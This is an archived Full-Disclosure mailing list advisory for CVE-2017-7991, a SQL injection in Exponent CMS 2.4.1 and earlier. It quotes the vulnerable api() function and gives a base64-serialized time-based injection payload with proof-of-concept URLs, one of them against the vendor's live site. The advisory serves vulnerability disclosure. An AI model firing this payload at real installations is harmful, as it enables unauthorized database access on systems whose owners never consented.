lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <tencent_00A76ED10D152E9103044314@qq.com> Date: Fri, 21 Apr 2017 14:14:38 +0800 From: "404 Not Found" <root@...notfound.org> To: "fulldisclosure" <fulldisclosure@...lists.org> Subject: [FD] CVE-2017-7991-SQL injection-Exponent CMS CVE-2017-7991-SQL injection-Exponent CMS [Suggested description] > Exponent CMS 2.4.1 and earlier has SQL injection via a base64 > serialized API key (apikey parameter) in the api function of > framework/modules/eaas/controllers/eaasController.php. > > ------------------------------------------ > > [Additional Information] > Vulnerable file is: /framework/modules/eaas/controllers/eaasController.php > Vulnerable function is api. > > public function api() { > if (empty($this->params['apikey'])) { > $_REQUEST['apikey'] = true; // set this to force an ajax reply > $ar = new expAjaxReply(550, 'Permission Denied', 'You need an API key in order to access Exponent as a Service', null); > $ar->send(); //FIXME this doesn't seem to work correctly in this scenario > } else { > echo $this->params['apikey']; > $key = expUnserialize(base64_decode(urldecode($this->params['apikey']))); > echo $key; > > $cfg = new expConfig($key); > $this->config = $cfg->config; > if(empty($cfg->id)) { > $ar = new expAjaxReply(550, 'Permission Denied', 'Incorrect API key or Exponent as a Service module configuration missing', null); > $ar->send(); > } else { > if (!empty($this->params['get'])) { > $this->handleRequest(); > } else { > $ar = new expAjaxReply(200, 'ok', 'Your API key is working, no data requested', null); > $ar->send(); > } > } > } > } > > We can control param $apikey by using base64_encode and serialize > functions to encrypt the SQL injection string. Then, the $apikey will > be decrypted and cause SQL injection. Such as, if we want to use > "aaa\'or sleep(2)#" to inject, we should use "echo > base64_encode(serialize($apikey));" to encrypt the Attack string: > czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7 is the result. So, > http://localhost:88/exponent/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7 > is the PoC. The result is: the site will sleep several seconds, and > you can see SQL injection is successful in MySQL logs. > > ------------------------------------------ > > [Vulnerability Type] > SQL Injection > > ------------------------------------------ > > [Vendor of Product] > Exponent CMS > > ------------------------------------------ > > [Affected Product Code Base] > Exponent CMS - 2.4.1 and earlier > > ------------------------------------------ > > [Affected Component] > \framework\modules\eaas\controllers\eaasController.php,function api(),param $apikey > > ------------------------------------------ > > [Attack Type] > Remote > > ------------------------------------------ > > [Impact Information Disclosure] > true > > ------------------------------------------ > > [Attack Vectors] > http://localhost:88/exponent/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7 > > http://www.exponentcms.org/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7 > > ------------------------------------------ > > [Discoverer] > 404notfound _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists